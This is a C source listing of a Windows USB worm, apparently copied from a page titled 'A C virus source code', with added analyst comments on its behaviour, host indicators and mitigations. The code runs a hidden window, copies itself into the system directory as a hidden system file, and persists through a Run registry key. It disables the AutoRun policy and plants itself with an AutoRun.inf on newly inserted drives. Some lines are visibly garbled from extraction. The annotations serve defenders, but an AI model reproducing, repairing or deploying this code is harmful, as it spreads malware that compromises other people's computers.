/*
 * Page title (translated): "A C virus source code".
 *
 * Analyst notes. The code below is kept token-for-token as it appears on the
 * page; only line breaks were restored and comments translated or added.
 * Extraction damaged the text, so this is a reading specimen rather than
 * buildable code.
 *
 * Behaviour visible in the listing:
 *   - Creates a disabled, zero-size window (no ShowWindow call) and uses it
 *     to receive a 5-second WM_TIMER and WM_DEVICECHANGE.
 *   - When the running image is not on the same drive as the system
 *     directory, copies itself into the system directory under szSysName,
 *     marks the copy hidden+system and writes two registry values
 *     (see RegAutoRun).
 *   - On DBT_DEVICEARRIVAL for a volume, copies itself to the root of that
 *     volume under szExeName and writes an AutoRun.inf next to it, both
 *     marked hidden+system.
 *
 * Artefacts a defender can look for:
 *   - a value named after szSysName under
 *     HKLM\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run;
 *   - NoDriveTypeAutoRun set to 0 under
 *     HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer;
 *   - a hidden+system AutoRun.inf and executable at the root of a newly
 *     attached volume;
 *   - a hidden+system executable in the system directory.
 *
 * Mitigation context: current Windows versions do not honour AutoRun.inf
 * launch entries on non-optical removable media by default; keeping that
 * policy enforced and alerting on changes to NoDriveTypeAutoRun blunts this
 * propagation path. Writing under HKLM normally requires administrative
 * rights, so day-to-day use without them limits the Run-key persistence.
 */
#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>
#include <Dbt.h>
#pragma comment(lib,'shlwapi.lib')
#define TIMER 1 // timer id used with SetTimer/KillTimer

//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); // window procedure
// get the drive letter
TCHAR FirstDriveFromMask (ULONG unitmask);
// functions used when the program was started from the USB drive
BOOL FileExist(TCHAR *path); // test whether a file exists
BOOL GetSelfPath(TCHAR *path);//Get the virus's path
//BOOL FindU(TCHAR *u);//check whether u exist, u[2]
BOOL GetSysPath(TCHAR *path); // get the system directory path
BOOL CopyToSysAndSet(HWND hwnd); // copy self into the system directory and configure it
BOOL SetFileAttrib(TCHAR *path); // set the attributes of the file at path
BOOL RegAutoRun(TCHAR *path); // modify the registry to start automatically
// functions used when the program was started from the C: drive
BOOL CopyToUAndSet(); // copy self to the USB drive
BOOL CreateAutoRunFile(TCHAR *path); // create autorun.inf on the USB drive
BOOL FindSelf(); // test whether a copy is already running

//global variable
TCHAR szExePath[MAX_PATH];//the virus's path
TCHAR U[2]; // holds the drive letter of the USB drive
TCHAR szSysPath[MAX_PATH];//system path

//constant
// File names used for the dropped copies; these are the names to search for
// on disk, in the Run key and in the process list.
const TCHAR *szExeName='bbbbb.exe';
const TCHAR *szSysName='aaaaa.exe';
const TCHAR *szAutoRunFile='AutoRun.inf';

/*
 * Entry point: registers a window class, creates one disabled zero-size
 * window and runs the message loop. All behaviour is driven from WndProc.
 */
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
                    PSTR szCmdLine, int iCmdShow)
{
    static TCHAR szAppName[]=TEXT ('UUUUUU');
    HWND hwnd;
    MSG msg;
    WNDCLASS wndclass;
    wndclass.style =0;
    wndclass.lpfnWndProc =WndProc;
    wndclass.cbClsExtra =0;
    wndclass.cbWndExtra =0;
    wndclass.hInstance =hInstance;
    wndclass.hIcon =0;
    wndclass.hCursor =0;
    wndclass.hbrBackground =0;
    wndclass.lpszMenuName =NULL;
    wndclass.lpszClassName =szAppName;
    if (!RegisterClass (&wndclass))
    {
        MessageBox (NULL,TEXT('Program requires Windows NT!'), szAppName, MB_ICONERROR);
        return 0;
    }
    // No title, WS_DISABLED, zero position and size; the window is never
    // shown, so the process has no visible UI.
    hwnd = CreateWindow (szAppName, NULL, WS_DISABLED, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);
    while (GetMessage(&msg, NULL, 0, 0))
    {
        TranslateMessage (&msg);
        DispatchMessage (&msg);
    }
    return msg.wParam;
}

/*
 * WM_DEVICECHANGE handler. Only volume arrival is acted on: the drive letter
 * is derived from the broadcast unit mask and CopyToUAndSet() is called.
 * hwnd is not used.
 */
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
    PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
    switch(wParam)
    {
    case DBT_DEVICEARRIVAL: // device inserted
        if (lpdb -> dbch_devicetype == DBT_DEVTYP_VOLUME)
        {
            PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
            U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask); // get the USB drive letter
            //MessageBox(0,U,'Notice!',MB_OK);
            CopyToUAndSet(); // copy to the USB drive
        }
        break;
    case DBT_DEVICEREMOVECOMPLETE: // device removed
        break;
    }
    return LRESULT();
}

/*
 * Window procedure. The first case sets up the globals and a 5000 ms timer;
 * each timer tick either re-sends WM_DEVICECHANGE to this window (image on
 * the system drive) or calls CopyToSysAndSet() (image elsewhere).
 */
LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)
{
    switch(message)
    {
    case WM_Create: // initialise the globals used below
        U[1]=':';
        GetSysPath(szSysPath); // get the system directory path
        SetTimer(hwnd,TIMER,5000,0); // start the timer
        GetSelfPath(szExePath); // get the path of the running image
        return 0;
    case WM_TIMER: //timer message
        // Compares only the first character (the drive letter) of the two paths.
        if(szExePath[0]==szSysPath[0]) // started from the system drive
            SendMessage(hwnd,WM_DEVICECHANGE,0,0); // check for a device-insertion message
        else
        {
            CopyToSysAndSet(hwnd); // copy to the system drive and set autostart
        }
        return 0;
    case WM_DEVICECHANGE:
        OnDeviceChange(hwnd,wParam,lParam);
        return 0;
    case WM_DESTROY:
        KillTimer(hwnd,TIMER);
        PostQuitMessage(0);
        return 0;
    }
    return DefWindowProc(hwnd, message, wParam, lParam);
}

/*
 * Maps a DEV_BROADCAST_VOLUME unit mask to a drive letter by scanning the
 * mask from its lowest bit.
 */
TCHAR FirstDriveFromMask(ULONG unitmask)
{
    char i;
    for (i = 0; i < 26; i)
    {
        if (unitmask & 0x1) // check whether this drive's state changed
            break;
        unitmask = unitmask >> 1;
    }
    return (i 'A');
}

/* Stores the full path of the running image in path (MAX_PATH characters). */
BOOL GetSelfPath(TCHAR *path)
{
    if(GetModuleFileName(NULL,path,MAX_PATH)) // get the program's own path
    {
        return TRUE;
    }
    else
        return FALSE;
}

/* Stores the system directory in path; returns GetSystemDirectory's result. */
BOOL GetSysPath(TCHAR *path)
{
    return GetSystemDirectory(path,MAX_PATH); // get the system directory path
}

/*
 * Installs the copy in the system directory. If <system dir>\<szSysName>
 * does not exist yet: copy the running image there, write the registry
 * values and mark the copy hidden+system. If it exists but no process with
 * that image name is running: launch it hidden and close this instance.
 */
BOOL CopyToSysAndSet(HWND hwnd)
{
    TCHAR szPath[MAX_PATH];
    lstrcpy(szPath,szSysPath);
    lstrcat(szPath,'\\');
    lstrcat(szPath,szSysName); // full destination path inside the system directory
    if(!FileExist(szPath)) // is the copy already present in the system directory?
    {
        CopyFile(szExePath,szPath,FALSE);
        RegAutoRun(szPath);
        return SetFileAttrib(szPath);
    }
    else
    {
        if(!FindSelf()) // is the installed copy already running?
        {
            //MessageBox(0,szExePath,szPath,MB_OK);
            WinExec(szPath,SW_HIDE); // not running: start it
            SendMessage(hwnd,WM_CLOSE,0,0); // end this instance
        }
    }
    return FALSE;
}

/* Returns TRUE when PathFileExists reports that path exists. */
BOOL FileExist(TCHAR *path) // check whether the file at path exists
{
    int result;
    result=PathFileExists(path);
    if(result==1)
        return TRUE;
    else
        return FALSE;
}

/*
 * Marks the file hidden and system, which keeps it out of Explorer's default
 * view. Listing a volume root with hidden and protected system files shown
 * is a quick triage step.
 */
BOOL SetFileAttrib(TCHAR *path)
{
    return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}

/*
 * Writes the two registry values that serve as host indicators:
 *   1. HKCU ...\Policies\Explorer\NoDriveTypeAutoRun = 0. The value is a
 *      bitmask of drive types excluded from AutoRun, so 0 excludes none.
 *      The result of this first RegOpenKey is not checked.
 *   2. HKLM ...\CurrentVersion\Run\<szSysName> = path, so the copy starts at
 *      logon. Returns TRUE only when this key could be opened.
 */
BOOL RegAutoRun(TCHAR *path) // modify the registry to start automatically
{
    HKEY hkey;
    DWORD v=0;
    RegOpenKey(HKEY_CURRENT_USER,'Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer',&hkey);
    RegSetValueEx(hkey,'NoDriveTypeAutoRun',0,REG_DWORD,(LPBYTE)&v,sizeof(DWORD));
    if(RegOpenKey(HKEY_LOCAL_MACHINE,'SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run', &hkey)==ERROR_SUCCESS)
    {
        RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path));
        RegCloseKey(hkey);
        return TRUE;
    }
    else
        return FALSE;
}

/*
 * Populates the volume whose letter is in U: creates AutoRun.inf at its root
 * if missing, copies the running image there as szExeName if missing, and
 * marks both hidden+system.
 */
BOOL CopyToUAndSet()
{
    TCHAR szPath[MAX_PATH];
    lstrcpy(szPath,U);
    lstrcat(szPath,'\\');
    lstrcat(szPath,szExeName); // full path of the copy on the USB drive
    TCHAR szAutoFile[MAX_PATH];
    lstrcpy(szAutoFile,U);
    lstrcat(szAutoFile,'\\');
    lstrcat(szAutoFile,szAutoRunFile);
    if(!FileExist(szAutoFile))
    {
        CreateAutoRunFile(szAutoFile);
        SetFileAttrib(szAutoFile);
    }
    if(!FileExist(szPath))
    {
        CopyFile(szExePath,szPath,FALSE);
        return SetFileAttrib(szPath);
    }
    return FALSE;
}

/*
 * Writes an [AutoRun] section whose open=, shellexecute= and
 * shell\Auto\command= entries all name szExeName. An AutoRun.inf with these
 * keys pointing at an executable in the same root is the on-media indicator.
 */
BOOL CreateAutoRunFile(TCHAR *path) // create an autorun.inf file on the USB drive
{
    ofstream fout;
    fout.open(path);
    if(fout)
    {
        fout<<'[AutoRun]'<<endl;
        fout<<'open='<<szExeName<<' e'<<endl;
        fout<<'shellexecute='<<szExeName<<' e'<<endl;
        fout<<'shell\\Auto\\command='<<szExeName<<' e'<<endl;
        fout<<'shell=Auto'<<endl;
        fout.close();
        return TRUE;
    }
    return FALSE;
}

/*
 * Walks a process snapshot and returns TRUE when a process image name equals
 * szSysName. The same name is what a defender would match in a process
 * listing.
 */
BOOL FindSelf(){
    PROCESSENTRY32 pe;
    HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    pe.dwSize=sizeof(PROCESSENTRY32);
    if(Process32First(hShot,&pe)){
        do{
            if(lstrcmp(pe.szExeFile,szSysName)==0)
            {
                CloseHandle(hShot);
                return TRUE;
            }
        }while(Process32Next(hShot,&pe));
    }
    CloseHandle(hShot);
    return FALSE;
}